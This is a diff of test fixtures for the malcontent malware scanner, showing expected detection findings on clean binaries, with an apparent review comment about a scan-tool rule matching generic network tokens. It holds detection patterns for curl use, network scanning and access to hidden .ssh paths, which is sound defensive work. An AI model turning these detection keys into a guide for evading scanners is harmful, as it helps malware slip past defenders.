[fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | +| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | +| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | +| LOW | [net/http/2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http2.yara#http2) | Uses the HTTP/2 protocol | [HTTP/2](https://github.com/search?q=HTTP%2F2&type=code) | +| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) | +| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | +| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | +| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | +| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop](https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j)
[https://code.jquery.com/jquery-3.3.1.min.js](https://code.jquery.com/jquery-3.3.1.min.js)
[https://docs.rs/getrandom](https://docs.rs/getrandom)
[https://docs.rs/tree-sitter-language/](https://docs.rs/tree-sitter-language/)
[https://docs.rs/tree-sitter/](https://docs.rs/tree-sitter/)
[https://github.com/ChimeHQ/SwiftTreeSitter](https://github.com/ChimeHQ/SwiftTreeSitter)
[https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car](https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car)
[https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c](https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c)
[https://github.com/tree-sitter/tree-sitter-Failed](https://github.com/tree-sitter/tree-sitter-Failed)
[https://gitlab.com/https](https://gitlab.com/https)
[https://parser.cparser.h](https://parser.cparser.h)
[https://tree-sitter.github.io/tree-sitter.jshttps](https://tree-sitter.github.io/tree-sitter.jshttps)
[https://tree-sitter.github.io/tree-sitter.wasmhttps](https://tree-sitter.github.io/tree-sitter.wasmhttps)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png)
[https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT](https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT)
[https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j](https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j)
[https://tree-sitter.github.io/tree-sitter/creating-parsers](https://tree-sitter.github.io/tree-sitter/creating-parsers)
[https://tree-sitter.github.io/tree-sitter/playground](https://tree-sitter.github.io/tree-sitter/playground)
[https://tree-sitter.github.io/tree-sitter/syntax-highlighting](https://tree-sitter.github.io/tree-sitter/syntax-highlighting)
[https://tree-sitter.github.io/tree-sitter/using-parsers](https://tree-sitter.github.io/tree-sitter/using-parsers) |
+| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [stdout.write(output)](https://github.com/search?q=stdout.write%28output%29&type=code) |
+| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd -u env -i](https://github.com/search?q=cd+-u++env+-i&type=code) |
+| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) |
+| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) |
+| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) |
+| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) |
diff --git a/tests/linux/clean/trivy.simple b/tests/linux/clean/trivy.simple
index cadf870be..ccd6f1313 100644
--- a/tests/linux/clean/trivy.simple
+++ b/tests/linux/clean/trivy.simple
@@ -61,10 +61,10 @@ discover/system/sysinfo: medium
 discover/user/HOME: low
 discover/user/USER: low
 evasion/bypass_security/linux/iptables: medium
-evasion/covert_location/chdir_unusual: medium
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/var_run: medium
+evasion/file/location/chdir_unusual: medium
+evasion/file/location/dev_shm: medium
+evasion/file/location/var_run: medium
+evasion/file/prefix: medium
 exec/cmd: medium
 exec/conditional/LANG: low
 exec/dylib/symbol_address: medium
diff --git a/tests/linux/clean/trufflehog.md b/tests/linux/clean/trufflehog.md
index b356f137f..f365f9270 100644
--- a/tests/linux/clean/trufflehog.md
+++ b/tests/linux/clean/trufflehog.md
@@ -46,8 +46,8 @@
 | MEDIUM | [discover/network/netstat](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/netstat.yara#netstat) | Uses 'netstat' for network information | [netstat](https://github.com/search?q=netstat&type=code) |
 | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) |
 | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) |
-| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#dynamic_hidden_path) | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.ssh](https://github.com/search?q=%25s%2F.ssh&type=code) |
-| MEDIUM | [evasion/hidden_paths/var_run](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/var-run.yara#var_run_subfolder) | references subfolder within /var/run | [/var/run/slapd/](https://github.com/search?q=%2Fvar%2Frun%2Fslapd%2F&type=code) |
+| MEDIUM | [evasion/file/location/var_run](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/var-run.yara#var_run_subfolder) | references subfolder within /var/run | [/var/run/slapd/](https://github.com/search?q=%2Fvar%2Frun%2Fslapd%2F&type=code) |
+| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path) | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | 
[%s/.ssh](https://github.com/search?q=%25s%2F.ssh&type=code) |
 | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [ExecCommand](https://github.com/search?q=ExecCommand&type=code)
[Execute_Command_Line](https://github.com/search?q=Execute_Command_Line&type=code)
[MergeRunCmdOptions](https://github.com/search?q=MergeRunCmdOptions&type=code)
[RunCommandCursor](https://github.com/search?q=RunCommandCursor&type=code)
[StartCmdTrace](https://github.com/search?q=StartCmdTrace&type=code)
[StartCommandOptions](https://github.com/search?q=StartCommandOptions&type=code)
[execTxCommand](https://github.com/search?q=execTxCommand&type=code)
[executeCommand](https://github.com/search?q=executeCommand&type=code)
[processRunCommand](https://github.com/search?q=processRunCommand&type=code)
[runGitCommand](https://github.com/search?q=runGitCommand&type=code)
[runShellCommandAsynchronously](https://github.com/search?q=runShellCommandAsynchronously&type=code) |
 | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#exec_cmd_run) | executes external programs | [).CombinedOutput](https://github.com/search?q=%29.CombinedOutput&type=code)
[exec.(*Cmd).Run](https://github.com/search?q=exec.%28%2ACmd%29.Run&type=code) |
 | MEDIUM | [exec/script/osa](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/script/osascript.yara#osascript_caller) | osascript caller | [display dialog](https://github.com/search?q=display+dialog&type=code) |
@@ -68,7 +68,7 @@
 | MEDIUM | [fs/proc/self_mountinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-mountinfo.yara#proc_self_mountinfo) | gets mount info associated to this process | [/proc/self/mountinfo](https://github.com/search?q=%2Fproc%2Fself%2Fmountinfo&type=code) |
 | MEDIUM | [impact/ddos](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ddos/ddos.yara#ddos) | References DDoS | [DDoS](https://github.com/search?q=DDoS&type=code) |
 | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [:CodeWithScopeSpacerheartbeatinterval](https://github.com/search?q=%3ACodeWithScopeSpacerheartbeatinterval&type=code)
[ConnServer heartbeat started](https://github.com/search?q=ConnServer+heartbeat+started&type=code)
[HeartbeatMS](https://github.com/search?q=HeartbeatMS&type=code)
[SetHeartbeatInterval](https://github.com/search?q=SetHeartbeatInterval&type=code)
[WithHeartbeatInterval](https://github.com/search?q=WithHeartbeatInterval&type=code)
[WithHeartbeatTimeout](https://github.com/search?q=WithHeartbeatTimeout&type=code)
[be greater than or equal to the heartbeat interva](https://github.com/search?q=be+greater+than+or+equal+to+the+heartbeat+interva&type=code)
[comWriteDocumentElementheartbeatfrequenc](https://github.com/search?q=comWriteDocumentElementheartbeatfrequenc&type=code)
[comheartbeatMain: re](https://github.com/search?q=comheartbeatMain%3A+re&type=code)
[crc32Rolling backcleanup docsheartbeat_msgeo_d](https://github.com/search?q=crc32Rolling+backcleanup+docsheartbeat_msgeo_d&type=code)
[edConnection pool clearedServer heartbeat failedS](https://github.com/search?q=edConnection+pool+clearedServer+heartbeat+failedS&type=code)
[edclient_sql_exceptionFailed to heartbeat](https://github.com/search?q=edclient_sql_exceptionFailed+to+heartbeat&type=code)
[eerror setting read deadline in heartbeater:](https://github.com/search?q=eerror+setting+read+deadline+in+heartbeater%3A&type=code)
[eonly valid as initial handshakeheartbeat is not](https://github.com/search?q=eonly+valid+as+initial+handshakeheartbeat+is+not&type=code)
[heartbeatCtxCance](https://github.com/search?q=heartbeatCtxCance&type=code)
[heartbeatFrame](https://github.com/search?q=heartbeatFrame&type=code)
[heartbeatInterval](https://github.com/search?q=heartbeatInterval&type=code)
[heartbeatLock](https://github.com/search?q=heartbeatLock&type=code)
[heartbeatTimeout](https://github.com/search?q=heartbeatTimeout&type=code)
[icedisableConsoleLoginfailed to heartbeat](https://github.com/search?q=icedisableConsoleLoginfailed+to+heartbeat&type=code)
[newHeartbeatDuration](https://github.com/search?q=newHeartbeatDuration&type=code)
[orcHeartbeating](https://github.com/search?q=orcHeartbeating&type=code)
[overflow reading version stringHeartbeats should](https://github.com/search?q=overflow+reading+version+stringHeartbeats+should&type=code)
[parquetheartbeat started](https://github.com/search?q=parquetheartbeat+started&type=code)
[parseHeartbeatFrame](https://github.com/search?q=parseHeartbeatFrame&type=code)
[pollHeartbeatTime](https://github.com/search?q=pollHeartbeatTime&type=code)
[publishServerHeartbeatFailedEv](https://github.com/search?q=publishServerHeartbeatFailedEv&type=code)
[publishServerHeartbeatStartedE](https://github.com/search?q=publishServerHeartbeatStartedE&type=code)
[publishServerHeartbeatSucceede](https://github.com/search?q=publishServerHeartbeatSucceede&type=code)
[setupHeartbeatConnecti](https://github.com/search?q=setupHeartbeatConnecti&type=code)
[sha1publickeysubsystemheartbeatwithcoor](https://github.com/search?q=sha1publickeysubsystemheartbeatwithcoor&type=code)
[sheartbeat stopped](https://github.com/search?q=sheartbeat+stopped&type=code)
[startHeartBeat](https://github.com/search?q=startHeartBeat&type=code)
[stopHeartBeat](https://github.com/search?q=stopHeartBeat&type=code)
[swordincludeRetryReasonstopping heartbeat](https://github.com/search?q=swordincludeRetryReasonstopping+heartbeat&type=code)
[tarting server monitoringServer heartbeat succeed](https://github.com/search?q=tarting+server+monitoringServer+heartbeat+succeed&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [.in-addr.arpa](https://github.com/search?q=.in-addr.arpa&type=code)
[ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) | | MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [DoneDownloadCond](https://github.com/search?q=DoneDownloadCond&type=code)
[DownloadArtifactsFile](https://github.com/search?q=DownloadArtifactsFile&type=code)
[DownloadAvatar](https://github.com/search?q=DownloadAvatar&type=code)
[DownloadContentsWithMeta](https://github.com/search?q=DownloadContentsWithMeta&type=code)
[DownloadPackageFile](https://github.com/search?q=DownloadPackageFile&type=code)
[DownloadReleaseAsset](https://github.com/search?q=DownloadReleaseAsset&type=code)
[ExportDownload](https://github.com/search?q=ExportDownload&type=code)
[FTPDownload](https://github.com/search?q=FTPDownload&type=code)
[FailedDownloads](https://github.com/search?q=FailedDownloads&type=code)
[FuncDownloadHelper](https://github.com/search?q=FuncDownloadHelper&type=code)
[GeoIpDownloadStatistics](https://github.com/search?q=GeoIpDownloadStatistics&type=code)
[GetArchiveDownloadURL](https://github.com/search?q=GetArchiveDownloadURL&type=code)
[GetBrowserDownloadURL](https://github.com/search?q=GetBrowserDownloadURL&type=code)
[GetDownloadCount](https://github.com/search?q=GetDownloadCount&type=code)
[GetDownloadLocation](https://github.com/search?q=GetDownloadLocation&type=code)
[GetDownloadURL](https://github.com/search?q=GetDownloadURL&type=code)
[GetDownloadsURL](https://github.com/search?q=GetDownloadsURL&type=code)
[GetHasDownloads](https://github.com/search?q=GetHasDownloads&type=code)
[GetTempDownloadToken](https://github.com/search?q=GetTempDownloadToken&type=code)
[MFA_TOKENdownload start chunk](https://github.com/search?q=MFA_TOKENdownload+start+chunk&type=code)
[NextDownloader](https://github.com/search?q=NextDownloader&type=code)
[NodeInfoIngestDownloader](https://github.com/search?q=NodeInfoIngestDownloader&type=code)
[STREAM_CHUNK_DOWNLOADSF_CLIENT_CONFIG](https://github.com/search?q=STREAM_CHUNK_DOWNLOADSF_CLIENT_CONFIG&type=code)
[SuccessfulDownloads](https://github.com/search?q=SuccessfulDownloads&type=code)
[URLDownloadToFile](https://github.com/search?q=URLDownloadToFile&type=code)
[addDownloader](https://github.com/search?q=addDownloader&type=code)
[archive_download_url](https://github.com/search?q=archive_download_url&type=code)
[browser_download_url](https://github.com/search?q=browser_download_url&type=code)
[chunkDownloader](https://github.com/search?q=chunkDownloader&type=code)
[chunk_downloader](https://github.com/search?q=chunk_downloader&type=code)
[downloadChunkHelper](https://github.com/search?q=downloadChunkHelper&type=code)
[downloadH](https://github.com/search?q=downloadH&type=code)
[downloadLocation](https://github.com/search?q=downloadLocation&type=code)
[downloadOCSPCacheServer](https://github.com/search?q=downloadOCSPCacheServer&type=code)
[downloadPatches](https://github.com/search?q=downloadPatches&type=code)
[download_count](https://github.com/search?q=download_count&type=code)
[downloader id](https://github.com/search?q=downloader+id&type=code)
[downloads_url](https://github.com/search?q=downloads_url&type=code)
[downloadsrepos](https://github.com/search?q=downloadsrepos&type=code)
[failed_downloads](https://github.com/search?q=failed_downloads&type=code)
[funcDownloadHelper](https://github.com/search?q=funcDownloadHelper&type=code)
[geoipdownloadstatistics](https://github.com/search?q=geoipdownloadstatistics&type=code)
[getNextChunkDownloader](https://github.com/search?q=getNextChunkDownloader&type=code)
[has_downloads](https://github.com/search?q=has_downloads&type=code)
[methodTotalDownloadTimeshards](https://github.com/search?q=methodTotalDownloadTimeshards&type=code)
[newStreamChunkDownloader](https://github.com/search?q=newStreamChunkDownloader&type=code)
[nodeinfoingestdownloader](https://github.com/search?q=nodeinfoingestdownloader&type=code)
[populateChunkDownloader](https://github.com/search?q=populateChunkDownloader&type=code)
[profileno download link found for](https://github.com/search?q=profileno+download+link+found+for&type=code)
[setNextChunkDownloader](https://github.com/search?q=setNextChunkDownloader&type=code)
[snowflakeChunkDownloader](https://github.com/search?q=snowflakeChunkDownloader&type=code)
[sstart downloading](https://github.com/search?q=sstart+downloading&type=code)
[streamChunkDownloader](https://github.com/search?q=streamChunkDownloader&type=code)
[successful_downloads](https://github.com/search?q=successful_downloads&type=code)
[tailChunkDownloader](https://github.com/search?q=tailChunkDownloader&type=code)
[temp_download_token](https://github.com/search?q=temp_download_token&type=code)
[the scheduleddownloads](https://github.com/search?q=the+scheduleddownloads&type=code)
[theequationsdownload](https://github.com/search?q=theequationsdownload&type=code)
[thresholddownloading error](https://github.com/search?q=thresholddownloading+error&type=code)
[total_download_time](https://github.com/search?q=total_download_time&type=code)
[useStreamDownloader](https://github.com/search?q=useStreamDownloader&type=code)
[vMaxChunkDownloadWorkers](https://github.com/search?q=vMaxChunkDownloadWorkers&type=code)
[vmsdownloading done](https://github.com/search?q=vmsdownloading+done&type=code)
[wcould not download file for scan](https://github.com/search?q=wcould+not+download+file+for+scan&type=code)
[wfailed to download patches](https://github.com/search?q=wfailed+to+download+patches&type=code)
[when trying to download file for scan](https://github.com/search?q=when+trying+to+download+file+for+scan&type=code) | | MEDIUM | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_value) | Invokes curl | [curl / libcurl / php_curl](https://github.com/search?q=curl+%2F+libcurl+%2F+php_curl&type=code) | diff --git a/tests/linux/clean/viewgam.md b/tests/linux/clean/viewgam.md index 8ba839e52..b873ee458 100644 --- a/tests/linux/clean/viewgam.md +++ b/tests/linux/clean/viewgam.md @@ -3,6 +3,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|-------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [Download manager stalled](https://github.com/search?q=Download+manager+stalled&type=code)
[DownloadManager](https://github.com/search?q=DownloadManager&type=code)
[activeDownloads](https://github.com/search?q=activeDownloads&type=code)
[downloadCount--](https://github.com/search?q=downloadCount--&type=code)
[downloadStartTimer](https://github.com/search?q=downloadStartTimer&type=code)
[downloading](https://github.com/search?q=downloading&type=code)
[internalDownloadCount-](https://github.com/search?q=internalDownloadCount-&type=code)
[maxActiveDownloads](https://github.com/search?q=maxActiveDownloads&type=code)
[maxDownloads](https://github.com/search?q=maxDownloads&type=code)
[removeDownload](https://github.com/search?q=removeDownload&type=code)
[tryNextDownload](https://github.com/search?q=tryNextDownload&type=code)
[var downloadCallbacks](https://github.com/search?q=var+downloadCallbacks&type=code) |
 | MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [WebSocket](https://github.com/search?q=WebSocket&type=code) |
 | LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) |
diff --git a/tests/linux/clean/wolfictl.simple b/tests/linux/clean/wolfictl.simple
index b371cf324..a8e53c4ae 100644
--- a/tests/linux/clean/wolfictl.simple
+++ b/tests/linux/clean/wolfictl.simple
@@ -54,9 +54,9 @@ discover/user/USER: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/se: medium
 evasion/bypass_security/macos/xprotect: medium
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/hidden: medium
-evasion/hide_artifacts/system_directories: medium
+evasion/file/location/dev_shm: medium
+evasion/file/location/system_directories: medium
+evasion/file/prefix: medium
 exec/cmd: medium
 exec/conditional/LANG: low
 exec/dylib/symbol_address: medium
diff --git a/tests/linux/clean/zipdetails.md b/tests/linux/clean/zipdetails.md
index 78f16d5fd..68b70d3b9 100644
--- a/tests/linux/clean/zipdetails.md
+++ b/tests/linux/clean/zipdetails.md
@@ -5,7 +5,7 @@
 | MEDIUM | [anti-static/obfuscation/bitwise](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/bitwise.yara#bidirectional_bitwise_math) | [uses bitwise math in both directions](https://www.reversinglabs.com/blog/python-downloader-highlights-noise-problem-in-open-source-threat-detection) | [1 << 0](https://github.com/search?q=1+%3C%3C+0&type=code)
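Review bot: The clean `viewgam` fixture now gains a MEDIUM `lateral/scan/tool` ("may scan networks") row whose only evidence is the generic tokens connect, port, scan, socket and target, and the same rule newly fires on the clean macOS `ls` fixture further down (ls.mdiff and the three ls.sdiff files) on connect, port, socket, target. Those identifiers appear in most binaries that open a socket, so these expectation updates look like they record a precision regression rather than new coverage. The `generic_scan_tool` change in rules/lateral/scan/scan_tool.yara is outside this chunk, but the earlier hunk in this chunk where `gethostbyname` disappears from that rule's evidence list suggests its strings or condition were reworked. I would require at least one scan-specific token (`probe` or `banner` alongside `scan`) or a higher minimum match count before accepting clean fixtures that carry this finding.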
[1 << 11](https://github.com/search?q=1+%3C%3C+11&type=code)
[1 << 3](https://github.com/search?q=1+%3C%3C+3&type=code)
[1 << 4](https://github.com/search?q=1+%3C%3C+4&type=code)
[1 << 5](https://github.com/search?q=1+%3C%3C+5&type=code)
[1 << 6](https://github.com/search?q=1+%3C%3C+6&type=code)
[2 << 1](https://github.com/search?q=2+%3C%3C+1&type=code)
[dt << 1](https://github.com/search?q=dt+%3C%3C+1&type=code)
[dt >> 11](https://github.com/search?q=dt+%3E%3E+11&type=code)
[dt >> 16](https://github.com/search?q=dt+%3E%3E+16&type=code)
[dt >> 21](https://github.com/search?q=dt+%3E%3E+21&type=code)
[dt >> 25](https://github.com/search?q=dt+%3E%3E+25&type=code)
[dt >> 5](https://github.com/search?q=dt+%3E%3E+5&type=code)
[got << 8](https://github.com/search?q=got+%3C%3C+8&type=code)
[gp >> 1](https://github.com/search?q=gp+%3E%3E+1&type=code) | | MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#excessive_hex_refs) | many references to hexadecimal values | [0x0001](https://github.com/search?q=0x0001&type=code)
[0x0007](https://github.com/search?q=0x0007&type=code)
[0x0008](https://github.com/search?q=0x0008&type=code)
[0x0009](https://github.com/search?q=0x0009&type=code)
[0x000a](https://github.com/search?q=0x000a&type=code)
[0x000c](https://github.com/search?q=0x000c&type=code)
[0x000d](https://github.com/search?q=0x000d&type=code)
[0x000e](https://github.com/search?q=0x000e&type=code)
[0x000f](https://github.com/search?q=0x000f&type=code)
[0x0014](https://github.com/search?q=0x0014&type=code)
[0x0015](https://github.com/search?q=0x0015&type=code)
[0x0016](https://github.com/search?q=0x0016&type=code)
[0x0017](https://github.com/search?q=0x0017&type=code)
[0x0018](https://github.com/search?q=0x0018&type=code)
[0x0019](https://github.com/search?q=0x0019&type=code)
[0x0020](https://github.com/search?q=0x0020&type=code)
[0x0021](https://github.com/search?q=0x0021&type=code)
[0x0022](https://github.com/search?q=0x0022&type=code)
[0x0023](https://github.com/search?q=0x0023&type=code)
[0x0065](https://github.com/search?q=0x0065&type=code)
[0x0066](https://github.com/search?q=0x0066&type=code)
[0x01](https://github.com/search?q=0x01&type=code)
[0x02014b50](https://github.com/search?q=0x02014b50&type=code)
[0x03](https://github.com/search?q=0x03&type=code)
[0x04034b50](https://github.com/search?q=0x04034b50&type=code)
[0x05054b50](https://github.com/search?q=0x05054b50&type=code)
[0x06054b50](https://github.com/search?q=0x06054b50&type=code)
[0x06064b50](https://github.com/search?q=0x06064b50&type=code)
[0x07064b50](https://github.com/search?q=0x07064b50&type=code)
[0x07c8](https://github.com/search?q=0x07c8&type=code)
[0x08064b50](https://github.com/search?q=0x08064b50&type=code)
[0x08074b50](https://github.com/search?q=0x08074b50&type=code)
[0x0f](https://github.com/search?q=0x0f&type=code)
[0x10000000](https://github.com/search?q=0x10000000&type=code)
[0x19DB1DED](https://github.com/search?q=0x19DB1DED&type=code)
[0x1f](https://github.com/search?q=0x1f&type=code)
[0x20](https://github.com/search?q=0x20&type=code)
[0x2146444e](https://github.com/search?q=0x2146444e&type=code)
[0x2605](https://github.com/search?q=0x2605&type=code)
[0x2705](https://github.com/search?q=0x2705&type=code)
[0x2805](https://github.com/search?q=0x2805&type=code)
[0x334d](https://github.com/search?q=0x334d&type=code)
[0x3e](https://github.com/search?q=0x3e&type=code)
[0x3f](https://github.com/search?q=0x3f&type=code)
[0x4154](https://github.com/search?q=0x4154&type=code)
[0x42726577](https://github.com/search?q=0x42726577&type=code)
[0x4341](https://github.com/search?q=0x4341&type=code)
[0x4453](https://github.com/search?q=0x4453&type=code)
[0x4690](https://github.com/search?q=0x4690&type=code)
[0x4704](https://github.com/search?q=0x4704&type=code)
[0x470f](https://github.com/search?q=0x470f&type=code)
[0x4854](https://github.com/search?q=0x4854&type=code)
[0x4b46](https://github.com/search?q=0x4b46&type=code)
[0x4c41](https://github.com/search?q=0x4c41&type=code)
[0x4d49](https://github.com/search?q=0x4d49&type=code)
